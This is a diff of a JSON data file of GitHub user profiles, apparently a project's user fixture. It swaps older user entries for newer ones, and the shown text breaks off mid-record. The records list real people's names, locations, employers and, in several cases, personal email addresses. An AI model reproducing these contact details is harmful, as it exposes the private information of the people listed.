{ - "nest_created_at": "2024-09-12T00:25:30.885Z", - "nest_updated_at": "2024-09-12T00:25:30.885Z", - "name": "", - "login": "yuliym", + "nest_created_at": "2024-09-22T08:36:37.670Z", + "nest_updated_at": "2024-09-22T19:24:29.129Z", + "name": "Sampath", + "login": "SampathKumarAmex", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6725070?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/61689771?v=4", + "company": "American Express", + "location": "United Kingdom", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2014-02-19T09:13:32Z", - "updated_at": "2023-11-03T15:13:23Z", - "node_id": "MDQ6VXNlcjY3MjUwNzA=", + "public_repositories_count": 21, + "created_at": "2020-03-02T10:56:51Z", + "updated_at": "2024-09-11T10:27:31Z", + "node_id": "MDQ6VXNlcjYxNjg5Nzcx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -403703,174 +661752,174 @@ }, { "model": "github.user", - "pk": 1739, + "pk": 7034, "fields": { - "nest_created_at": "2024-09-12T00:25:31.716Z", - "nest_updated_at": "2024-09-12T00:25:31.716Z", - "name": "mirabilos", - "login": "mirabilos", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/861078?v=4", - "company": "", - "location": "Eifel-Ardennen", + "nest_created_at": "2024-09-22T08:36:37.981Z", + "nest_updated_at": "2024-09-22T18:53:49.847Z", + "name": "Siddharth Sahoo", + "login": "sidd-oo", + "email": "sahoosiddharth3@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/25115188?v=4", + "company": "Kointrack", + "location": "Bangalore, Karnataka, India", "collaborators_count": 0, - "following_count": 11, - "followers_count": 74, - "public_gists_count": 4, - "public_repositories_count": 50, - "created_at": "2011-06-20T07:22:34Z", - "updated_at": "2024-04-10T21:52:56Z", - "node_id": "MDQ6VXNlcjg2MTA3OA==", - "bio": "🇪🇺\r\nOpen Source. Free Sheet Music. Open Educational Resources. Few of my good stuff on this proprietary platform. https://launchpad.net/~mirabilos has links.", - "is_hireable": false, - "twitter_username": "" + "following_count": 14, + "followers_count": 22, + "public_gists_count": 0, + "public_repositories_count": 91, + "created_at": "2017-01-14T06:17:37Z", + "updated_at": "2024-07-02T19:33:16Z", + "node_id": "MDQ6VXNlcjI1MTE1MTg4", + "bio": "Full Stack Engineer @kointrack | ex @bigBinary, Open Source Enthusiast @Layer5io", + "is_hireable": true, + "twitter_username": "sidd_oo" } }, { "model": "github.user", - "pk": 1740, + "pk": 7035, "fields": { - "nest_created_at": "2024-09-12T00:25:32.917Z", - "nest_updated_at": "2024-09-12T00:25:32.917Z", - "name": "Georg Tsakumagos", - "login": "G-Ork", + "nest_created_at": "2024-09-22T08:37:21.155Z", + "nest_updated_at": "2024-09-22T19:22:34.904Z", + "name": "Akshath Kothari", + "login": "ricekot", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/28452503?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16446369?v=4", + "company": "@Traceableai", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 14, - "created_at": "2017-05-05T17:03:44Z", - "updated_at": "2024-05-12T17:01:46Z", - "node_id": "MDQ6VXNlcjI4NDUyNTAz", - "bio": "", + "followers_count": 53, + "public_gists_count": 1, + "public_repositories_count": 69, + "created_at": "2015-12-26T17:59:22Z", + "updated_at": "2024-09-11T06:21:48Z", + "node_id": "MDQ6VXNlcjE2NDQ2MzY5", + "bio": "nothing ventured, nothing gained", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1741, + "pk": 7036, "fields": { - "nest_created_at": "2024-09-12T00:25:34.136Z", - "nest_updated_at": "2024-09-12T00:25:34.136Z", - "name": "zackq", - "login": "kyrogue", + "nest_created_at": "2024-09-22T08:37:25.395Z", + "nest_updated_at": "2024-09-22T19:22:08.551Z", + "name": "Aurélien Reeves", + "login": "aurelien-reeves", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/655464?v=4", - "company": "none", - "location": "singapore", + "avatar_url": "https://avatars.githubusercontent.com/u/24386780?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 5, - "public_gists_count": 3, + "following_count": 0, + "followers_count": 6, + "public_gists_count": 0, "public_repositories_count": 20, - "created_at": "2011-03-07T12:08:16Z", - "updated_at": "2024-09-03T07:27:35Z", - "node_id": "MDQ6VXNlcjY1NTQ2NA==", - "bio": "hello!", - "is_hireable": true, + "created_at": "2016-12-05T11:01:12Z", + "updated_at": "2023-06-11T12:40:03Z", + "node_id": "MDQ6VXNlcjI0Mzg2Nzgw", + "bio": "", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1742, + "pk": 7037, "fields": { - "nest_created_at": "2024-09-12T00:25:35.348Z", - "nest_updated_at": "2024-09-12T00:25:35.348Z", - "name": "Ronald (Gundlach-Chmara) Chmara", - "login": "ronabop", + "nest_created_at": "2024-09-22T08:37:51.762Z", + "nest_updated_at": "2024-09-22T19:22:34.587Z", + "name": "Ramiro Rela", + "login": "avarama", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/76779?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/78261748?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 27, - "followers_count": 11, - "public_gists_count": 0, - "public_repositories_count": 85, - "created_at": "2009-04-22T23:13:00Z", - "updated_at": "2022-12-30T08:13:44Z", - "node_id": "MDQ6VXNlcjc2Nzc5", - "bio": "", + "following_count": 1, + "followers_count": 3, + "public_gists_count": 1, + "public_repositories_count": 3, + "created_at": "2021-01-30T12:26:53Z", + "updated_at": "2024-06-18T14:00:19Z", + "node_id": "MDQ6VXNlcjc4MjYxNzQ4", + "bio": "Developer, Mentor, Software Engineer in Test, Security Engineer.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1743, + "pk": 7038, "fields": { - "nest_created_at": "2024-09-12T00:25:36.977Z", - "nest_updated_at": "2024-09-12T00:25:36.978Z", - "name": "Changhai Ke", - "login": "chnke", + "nest_created_at": "2024-09-22T08:38:07.049Z", + "nest_updated_at": "2024-09-22T19:22:50.493Z", + "name": "Cyril Grossenbacher", + "login": "groscy", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/30302546?v=4", - "company": "IBM", + "avatar_url": "https://avatars.githubusercontent.com/u/92256856?v=4", + "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, + "following_count": 2, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2017-07-19T22:16:34Z", - "updated_at": "2024-08-29T07:39:04Z", - "node_id": "MDQ6VXNlcjMwMzAyNTQ2", - "bio": "Security architect, Decisions, IBM Cloud Pak for Automation", + "public_repositories_count": 5, + "created_at": "2021-10-10T12:27:20Z", + "updated_at": "2024-09-20T12:32:54Z", + "node_id": "U_kgDOBX-6WA", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1744, + "pk": 7039, "fields": { - "nest_created_at": "2024-09-12T00:25:38.176Z", - "nest_updated_at": "2024-09-12T00:33:59.966Z", - "name": "Dave Brosius", - "login": "mebigfatguy", - "email": "dbrosius@mebigfatguy.com", - "avatar_url": "https://avatars.githubusercontent.com/u/170161?v=4", + "nest_created_at": "2024-09-22T08:38:07.379Z", + "nest_updated_at": "2024-09-22T19:22:50.804Z", + "name": "Shreyas Bhaskarwar", + "login": "shreyasbhaskarwar", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/25261965?v=4", "company": "", - "location": "Eastern Shore, MD", + "location": "", "collaborators_count": 0, "following_count": 1, - "followers_count": 101, - "public_gists_count": 1, - "public_repositories_count": 97, - "created_at": "2009-12-20T15:29:58Z", - "updated_at": "2024-07-01T13:53:55Z", - "node_id": "MDQ6VXNlcjE3MDE2MQ==", - "bio": "just a beaten up old man.", - "is_hireable": true, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2017-01-21T07:29:24Z", + "updated_at": "2024-03-26T20:48:50Z", + "node_id": "MDQ6VXNlcjI1MjYxOTY1", + "bio": "", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1745, + "pk": 7040, "fields": { - "nest_created_at": "2024-09-12T00:25:39.386Z", - "nest_updated_at": "2024-09-12T00:27:46.987Z", + "nest_created_at": "2024-09-22T08:38:08.046Z", + "nest_updated_at": "2024-09-22T19:22:51.435Z", "name": "", - "login": "Anshu2405", + "login": "bt-nia", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/53894207?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/74181389?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2019-08-08T07:17:05Z", - "updated_at": "2023-03-14T10:41:37Z", - "node_id": "MDQ6VXNlcjUzODk0MjA3", + "public_repositories_count": 26, + "created_at": "2020-11-09T09:55:18Z", + "updated_at": "2021-12-03T12:39:43Z", + "node_id": "MDQ6VXNlcjc0MTgxMzg5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -403878,24 +661927,24 @@ }, { "model": "github.user", - "pk": 1746, + "pk": 7041, "fields": { - "nest_created_at": "2024-09-12T00:25:41.058Z", - "nest_updated_at": "2024-09-12T00:25:41.058Z", - "name": "nbinny", - "login": "greg64thomas", - "email": "greg.thomas@intel.com", - "avatar_url": "https://avatars.githubusercontent.com/u/60514140?v=4", + "nest_created_at": "2024-09-22T08:38:21.709Z", + "nest_updated_at": "2024-09-22T20:26:56.558Z", + "name": "", + "login": "semgrep-bot", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/170460994?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 2, "public_gists_count": 0, "public_repositories_count": 0, - "created_at": "2020-01-31T14:49:44Z", - "updated_at": "2024-09-03T08:58:38Z", - "node_id": "MDQ6VXNlcjYwNTE0MTQw", + "created_at": "2024-05-21T18:32:46Z", + "updated_at": "2024-08-08T21:49:47Z", + "node_id": "U_kgDOCikHQg", "bio": "", "is_hireable": false, "twitter_username": "" @@ -403903,74 +661952,74 @@ }, { "model": "github.user", - "pk": 1747, + "pk": 7042, "fields": { - "nest_created_at": "2024-09-12T00:25:42.639Z", - "nest_updated_at": "2024-09-12T00:25:42.639Z", - "name": "Arnaud Quillaud", - "login": "arnaudq", + "nest_created_at": "2024-09-22T08:38:44.824Z", + "nest_updated_at": "2024-09-22T19:23:28.080Z", + "name": "Pravin", + "login": "agrepravin", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1408679?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/12726996?v=4", "company": "", - "location": "Montpellier, France", + "location": "Mumbai", "collaborators_count": 0, - "following_count": 4, - "followers_count": 5, - "public_gists_count": 1, - "public_repositories_count": 2, - "created_at": "2012-02-04T20:26:01Z", - "updated_at": "2024-03-06T05:56:38Z", - "node_id": "MDQ6VXNlcjE0MDg2Nzk=", - "bio": "", + "following_count": 1, + "followers_count": 19, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2015-06-03T07:15:23Z", + "updated_at": "2024-07-13T04:00:20Z", + "node_id": "MDQ6VXNlcjEyNzI2OTk2", + "bio": "Python Programmer ", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1748, + "pk": 7043, "fields": { - "nest_created_at": "2024-09-12T00:25:43.857Z", - "nest_updated_at": "2024-09-12T00:25:43.857Z", - "name": "Christian Fehlinger", - "login": "ChristianFehlinger", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3738607?v=4", + "nest_created_at": "2024-09-22T08:38:45.139Z", + "nest_updated_at": "2024-09-22T19:23:28.400Z", + "name": "Anthony Suárez", + "login": "neolight1010", + "email": "neolight1010@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/58057324?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 5, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2013-03-01T13:45:37Z", - "updated_at": "2024-09-08T14:47:01Z", - "node_id": "MDQ6VXNlcjM3Mzg2MDc=", - "bio": "", + "following_count": 29, + "followers_count": 26, + "public_gists_count": 1, + "public_repositories_count": 78, + "created_at": "2019-11-22T01:46:43Z", + "updated_at": "2024-09-17T14:48:09Z", + "node_id": "MDQ6VXNlcjU4MDU3MzI0", + "bio": "Passionate software developer and open-source advocate. I love building reliable, high-quality software with modern technologies.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "NeoLight1010" } }, { "model": "github.user", - "pk": 1749, + "pk": 7044, "fields": { - "nest_created_at": "2024-09-12T00:25:45.035Z", - "nest_updated_at": "2024-09-12T00:26:58.056Z", - "name": "Alexandre", - "login": "aubertaa", + "nest_created_at": "2024-09-22T08:38:45.454Z", + "nest_updated_at": "2024-09-22T19:23:28.746Z", + "name": "Sooraj Soman", + "login": "soorajsomans", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/14087776?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/11995071?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 1, "followers_count": 6, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2015-09-02T06:59:10Z", - "updated_at": "2024-07-30T14:09:23Z", - "node_id": "MDQ6VXNlcjE0MDg3Nzc2", + "public_repositories_count": 26, + "created_at": "2015-04-17T13:54:59Z", + "updated_at": "2024-08-29T11:32:25Z", + "node_id": "MDQ6VXNlcjExOTk1MDcx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -403978,49 +662027,74 @@ }, { "model": "github.user", - "pk": 1750, + "pk": 7045, "fields": { - "nest_created_at": "2024-09-12T00:25:46.662Z", - "nest_updated_at": "2024-09-12T00:25:46.662Z", - "name": "", - "login": "RyanMcC", + "nest_created_at": "2024-09-22T08:38:45.773Z", + "nest_updated_at": "2024-09-22T19:23:29.065Z", + "name": "Varun Nair", + "login": "masterugwee", + "email": "varun199700@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/10448437?v=4", + "company": "", + "location": "Kerala", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 31, + "public_gists_count": 0, + "public_repositories_count": 29, + "created_at": "2015-01-08T10:41:07Z", + "updated_at": "2024-09-02T11:53:40Z", + "node_id": "MDQ6VXNlcjEwNDQ4NDM3", + "bio": "\r\n Grad student. Network Pentesting\r\n\r\n\r\n", + "is_hireable": true, + "twitter_username": "7h3M0nk" + } +}, +{ + "model": "github.user", + "pk": 7046, + "fields": { + "nest_created_at": "2024-09-22T08:38:46.091Z", + "nest_updated_at": "2024-09-22T19:23:29.376Z", + "name": "Shaswat Satyam", + "login": "shaswat-satyam", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9652193?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/70892928?v=4", "company": "", - "location": "", + "location": "Delhi, India", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, + "following_count": 38, + "followers_count": 22, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2014-11-10T06:22:14Z", - "updated_at": "2024-05-20T20:07:52Z", - "node_id": "MDQ6VXNlcjk2NTIxOTM=", + "public_repositories_count": 82, + "created_at": "2020-09-07T10:41:01Z", + "updated_at": "2024-09-13T15:39:41Z", + "node_id": "MDQ6VXNlcjcwODkyOTI4", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1751, + "pk": 7047, "fields": { - "nest_created_at": "2024-09-12T00:25:47.890Z", - "nest_updated_at": "2024-09-12T00:25:47.890Z", - "name": "", - "login": "mbalande1", - "email": "mbalande1@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/22912753?v=4", + "nest_created_at": "2024-09-22T08:38:46.415Z", + "nest_updated_at": "2024-09-22T19:23:29.690Z", + "name": "Tiago Cardoso Matias", + "login": "tiagoCMatias", + "email": "tiagomatias.sw@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/32894635?v=4", "company": "", - "location": "", + "location": "Porto", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2016-10-18T12:57:41Z", - "updated_at": "2022-08-23T10:26:35Z", - "node_id": "MDQ6VXNlcjIyOTEyNzUz", + "following_count": 21, + "followers_count": 8, + "public_gists_count": 1, + "public_repositories_count": 35, + "created_at": "2017-10-18T07:39:51Z", + "updated_at": "2024-05-02T09:58:14Z", + "node_id": "MDQ6VXNlcjMyODk0NjM1", "bio": "Software Engineer", "is_hireable": false, "twitter_username": "" @@ -404028,99 +662102,99 @@ }, { "model": "github.user", - "pk": 1752, + "pk": 7048, "fields": { - "nest_created_at": "2024-09-12T00:25:49.095Z", - "nest_updated_at": "2024-09-12T00:26:12.305Z", - "name": "Josef Sabongui", - "login": "saboacn14", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9450352?v=4", + "nest_created_at": "2024-09-22T08:38:46.725Z", + "nest_updated_at": "2024-09-22T19:23:30.011Z", + "name": "Christian", + "login": "morenocl", + "email": "christianluciano.m@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/30539779?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 1, - "public_repositories_count": 0, - "created_at": "2014-10-29T16:51:45Z", - "updated_at": "2024-03-02T09:14:04Z", - "node_id": "MDQ6VXNlcjk0NTAzNTI=", - "bio": "", + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 37, + "created_at": "2017-07-29T00:09:03Z", + "updated_at": "2023-10-04T18:29:52Z", + "node_id": "MDQ6VXNlcjMwNTM5Nzc5", + "bio": "Super Sayajin\r\n \r\n", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1753, + "pk": 7049, "fields": { - "nest_created_at": "2024-09-12T00:25:50.301Z", - "nest_updated_at": "2024-09-12T00:25:50.301Z", - "name": "Ilya Idamkin", - "login": "IdamkinI", + "nest_created_at": "2024-09-22T08:38:47.045Z", + "nest_updated_at": "2024-09-22T19:23:30.321Z", + "name": "", + "login": "shivankar-madaan", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/8385274?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/23168725?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 94, + "followers_count": 57, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2014-08-07T13:28:10Z", - "updated_at": "2023-10-14T07:36:57Z", - "node_id": "MDQ6VXNlcjgzODUyNzQ=", - "bio": "", - "is_hireable": false, + "public_repositories_count": 16, + "created_at": "2016-10-31T12:37:55Z", + "updated_at": "2024-08-20T04:29:59Z", + "node_id": "MDQ6VXNlcjIzMTY4NzI1", + "bio": "#securityresearcher", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1754, + "pk": 7050, "fields": { - "nest_created_at": "2024-09-12T00:25:52.358Z", - "nest_updated_at": "2024-09-12T00:25:52.358Z", - "name": "Andrew Bruce", - "login": "camelpunch", - "email": "me@andrewbruce.net", - "avatar_url": "https://avatars.githubusercontent.com/u/141733?v=4", - "company": "@code-supply ", - "location": "UK", + "nest_created_at": "2024-09-22T08:38:47.358Z", + "nest_updated_at": "2024-09-22T19:23:30.663Z", + "name": "Manfredi", + "login": "mamarto", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11861308?v=4", + "company": "Wikimedia Foundation", + "location": "Remote", "collaborators_count": 0, - "following_count": 49, - "followers_count": 64, - "public_gists_count": 30, - "public_repositories_count": 162, - "created_at": "2009-10-19T16:26:45Z", - "updated_at": "2024-07-10T13:29:14Z", - "node_id": "MDQ6VXNlcjE0MTczMw==", - "bio": "", + "following_count": 6, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2015-04-08T21:56:53Z", + "updated_at": "2024-08-19T16:35:45Z", + "node_id": "MDQ6VXNlcjExODYxMzA4", + "bio": "Application Security Engineer @ Wikipedia", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1755, + "pk": 7051, "fields": { - "nest_created_at": "2024-09-12T00:25:54.358Z", - "nest_updated_at": "2024-09-12T00:25:54.358Z", + "nest_created_at": "2024-09-22T08:38:47.672Z", + "nest_updated_at": "2024-09-22T19:23:30.973Z", "name": "", - "login": "Simulant87", + "login": "robly78746", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5322205?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/9123386?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 3, + "following_count": 0, + "followers_count": 7, "public_gists_count": 0, - "public_repositories_count": 23, - "created_at": "2013-08-27T15:14:36Z", - "updated_at": "2024-08-18T07:32:29Z", - "node_id": "MDQ6VXNlcjUzMjIyMDU=", + "public_repositories_count": 28, + "created_at": "2014-10-09T23:07:30Z", + "updated_at": "2021-02-20T21:19:11Z", + "node_id": "MDQ6VXNlcjkxMjMzODY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -404128,49 +662202,74 @@ }, { "model": "github.user", - "pk": 1756, + "pk": 7052, "fields": { - "nest_created_at": "2024-09-12T00:25:55.562Z", - "nest_updated_at": "2024-09-12T00:25:59.237Z", - "name": "", - "login": "MichaelVetter", + "nest_created_at": "2024-09-22T08:38:47.986Z", + "nest_updated_at": "2024-09-22T19:23:31.284Z", + "name": "Sasika Sankalana", + "login": "SasikaSankalana", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7782813?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/79664299?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 4, + "followers_count": 6, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2014-06-03T15:43:04Z", - "updated_at": "2024-08-26T17:03:13Z", - "node_id": "MDQ6VXNlcjc3ODI4MTM=", - "bio": "", + "public_repositories_count": 24, + "created_at": "2021-02-25T19:29:27Z", + "updated_at": "2024-09-18T14:23:27Z", + "node_id": "MDQ6VXNlcjc5NjY0Mjk5", + "bio": "AI enthusiast", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1757, + "pk": 7053, "fields": { - "nest_created_at": "2024-09-12T00:26:00.438Z", - "nest_updated_at": "2024-09-12T00:35:35.502Z", - "name": "Hans Aikema", - "login": "aikebah", + "nest_created_at": "2024-09-22T08:38:48.300Z", + "nest_updated_at": "2024-09-22T19:23:31.601Z", + "name": "Vedant Borkar", + "login": "vedant-z", + "email": "vedantborkar1234@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/93431609?v=4", + "company": "", + "location": "India", + "collaborators_count": 0, + "following_count": 255, + "followers_count": 34, + "public_gists_count": 0, + "public_repositories_count": 100, + "created_at": "2021-10-30T11:33:36Z", + "updated_at": "2024-09-06T12:29:38Z", + "node_id": "U_kgDOBZGnOQ", + "bio": "こんにちは! (o゜▽゜)o", + "is_hireable": true, + "twitter_username": "VedantBorkar17" + } +}, +{ + "model": "github.user", + "pk": 7054, + "fields": { + "nest_created_at": "2024-09-22T08:38:48.978Z", + "nest_updated_at": "2024-09-22T19:23:32.230Z", + "name": "Fukusuke Takahashi", + "login": "fukusuket", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2175611?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/41001169?v=4", "company": "", - "location": "Nieuwegein, NL", + "location": "Japan", "collaborators_count": 0, - "following_count": 2, - "followers_count": 11, - "public_gists_count": 1, - "public_repositories_count": 15, - "created_at": "2012-08-18T17:12:08Z", - "updated_at": "2024-08-14T12:15:07Z", - "node_id": "MDQ6VXNlcjIxNzU2MTE=", + "following_count": 55, + "followers_count": 35, + "public_gists_count": 0, + "public_repositories_count": 53, + "created_at": "2018-07-09T11:54:12Z", + "updated_at": "2024-08-26T11:51:38Z", + "node_id": "MDQ6VXNlcjQxMDAxMTY5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -404178,24 +662277,49 @@ }, { "model": "github.user", - "pk": 1758, + "pk": 7055, "fields": { - "nest_created_at": "2024-09-12T00:26:01.706Z", - "nest_updated_at": "2024-09-12T00:26:01.706Z", - "name": "", - "login": "aehrlich", + "nest_created_at": "2024-09-22T08:38:49.297Z", + "nest_updated_at": "2024-09-22T19:23:32.551Z", + "name": "Rahul Kumar", + "login": "rahul0x00", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/307733?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/104289350?v=4", "company": "", - "location": "", + "location": "127.0.0.1", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 12, + "public_gists_count": 0, + "public_repositories_count": 72, + "created_at": "2022-04-24T04:04:36Z", + "updated_at": "2024-09-22T11:42:15Z", + "node_id": "U_kgDOBjdURg", + "bio": "just a dude with a computer... \r\n| Open Source & Community Work ", + "is_hireable": false, + "twitter_username": "rahul0x00" + } +}, +{ + "model": "github.user", + "pk": 7056, + "fields": { + "nest_created_at": "2024-09-22T08:38:49.613Z", + "nest_updated_at": "2024-09-22T19:23:32.866Z", + "name": "Olga Chebotaryova", + "login": "OlgaCh", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2905081?v=4", + "company": "", + "location": "Voronezh, Russia", "collaborators_count": 0, "following_count": 0, - "followers_count": 2, + "followers_count": 22, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2010-06-17T14:12:33Z", - "updated_at": "2021-01-07T09:32:30Z", - "node_id": "MDQ6VXNlcjMwNzczMw==", + "public_repositories_count": 34, + "created_at": "2012-11-27T19:42:53Z", + "updated_at": "2024-08-02T13:00:31Z", + "node_id": "MDQ6VXNlcjI5MDUwODE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -404203,74 +662327,74 @@ }, { "model": "github.user", - "pk": 1759, + "pk": 7057, "fields": { - "nest_created_at": "2024-09-12T00:26:03.779Z", - "nest_updated_at": "2024-09-12T03:14:04.631Z", - "name": "", - "login": "kerberosmansour", + "nest_created_at": "2024-09-22T08:38:49.943Z", + "nest_updated_at": "2024-09-22T19:23:33.183Z", + "name": "Jack Moulson", + "login": "Jacobite747", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13433538?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/9000948?v=4", "company": "", - "location": "", + "location": "United Kingdom", "collaborators_count": 0, - "following_count": 37, - "followers_count": 21, + "following_count": 2, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 47, - "created_at": "2015-07-21T10:39:02Z", - "updated_at": "2024-08-17T11:40:54Z", - "node_id": "MDQ6VXNlcjEzNDMzNTM4", - "bio": "", + "public_repositories_count": 3, + "created_at": "2014-10-02T19:42:36Z", + "updated_at": "2021-10-01T08:21:48Z", + "node_id": "MDQ6VXNlcjkwMDA5NDg=", + "bio": "Software Engineer. Building cool stuff for space 🚀", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1760, + "pk": 7058, "fields": { - "nest_created_at": "2024-09-12T00:26:04.959Z", - "nest_updated_at": "2024-09-12T00:26:04.959Z", - "name": "Gaweł Kazimierczuk", - "login": "kazigk", - "email": "contact@kazigk.me", - "avatar_url": "https://avatars.githubusercontent.com/u/8184274?v=4", + "nest_created_at": "2024-09-22T08:38:50.258Z", + "nest_updated_at": "2024-09-22T19:23:33.493Z", + "name": "", + "login": "42B", + "email": "42B@protonmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/37713517?v=4", "company": "", - "location": "Wrocław, Poland", + "location": "Canada", "collaborators_count": 0, "following_count": 0, - "followers_count": 21, - "public_gists_count": 2, - "public_repositories_count": 11, - "created_at": "2014-07-16T20:39:30Z", - "updated_at": "2024-08-14T11:23:40Z", - "node_id": "MDQ6VXNlcjgxODQyNzQ=", + "followers_count": 10, + "public_gists_count": 0, + "public_repositories_count": 40, + "created_at": "2018-03-23T19:38:02Z", + "updated_at": "2018-10-09T22:33:15Z", + "node_id": "MDQ6VXNlcjM3NzEzNTE3", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1761, + "pk": 7059, "fields": { - "nest_created_at": "2024-09-12T00:26:06.194Z", - "nest_updated_at": "2024-09-12T00:26:06.194Z", + "nest_created_at": "2024-09-22T08:38:50.581Z", + "nest_updated_at": "2024-09-22T19:23:33.807Z", "name": "", - "login": "cldfzn", + "login": "CarsonGSmith", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1036914?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/43037904?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 12, - "created_at": "2011-09-08T20:25:10Z", - "updated_at": "2024-08-26T14:56:24Z", - "node_id": "MDQ6VXNlcjEwMzY5MTQ=", + "public_repositories_count": 15, + "created_at": "2018-09-06T13:35:29Z", + "updated_at": "2019-11-06T16:59:05Z", + "node_id": "MDQ6VXNlcjQzMDM3OTA0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -404278,124 +662402,124 @@ }, { "model": "github.user", - "pk": 1762, + "pk": 7060, "fields": { - "nest_created_at": "2024-09-12T00:26:07.401Z", - "nest_updated_at": "2024-09-12T00:26:07.401Z", - "name": "Iris", - "login": "irisdingbj", - "email": "shaojun.ding@intel.com", - "avatar_url": 